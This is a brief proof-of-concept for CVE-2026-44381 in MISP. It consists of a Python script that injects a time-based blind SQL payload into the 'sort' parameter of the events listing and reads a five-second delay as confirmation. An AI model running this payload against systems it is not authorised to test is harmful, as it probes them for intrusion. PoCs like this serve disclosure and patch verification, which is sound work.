CVE-2026-44381 MISP SQL注入漏洞

# PoC for CVE-2026-44381 # This script demonstrates a time-based blind SQL injection # in the 'sort' parameter of the MISP event listing endpoint. import requests import time def check_sqli(url): # The payload attempts to cause a delay of 5 seconds # if the SQL syntax is executed correctly. payload = "id; SELECT SLEEP(5)--" params = { "sort": payload } try: print(f"[*] Testing target: {url}") start_time = time.time() response = requests.get(url, params=params, verify=False, timeout=10) end_time = time.time() elapsed = end_time - start_time if elapsed >= 5: print(f"[+] Vulnerability confirmed! Response took {elapsed:.2f} seconds.") else: print(f"[-] Vulnerability not detected or patched. Response took {elapsed:.2f} seconds.") except requests.RequestException as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": target = "https://<misp-target>/events/index" check_sqli(target)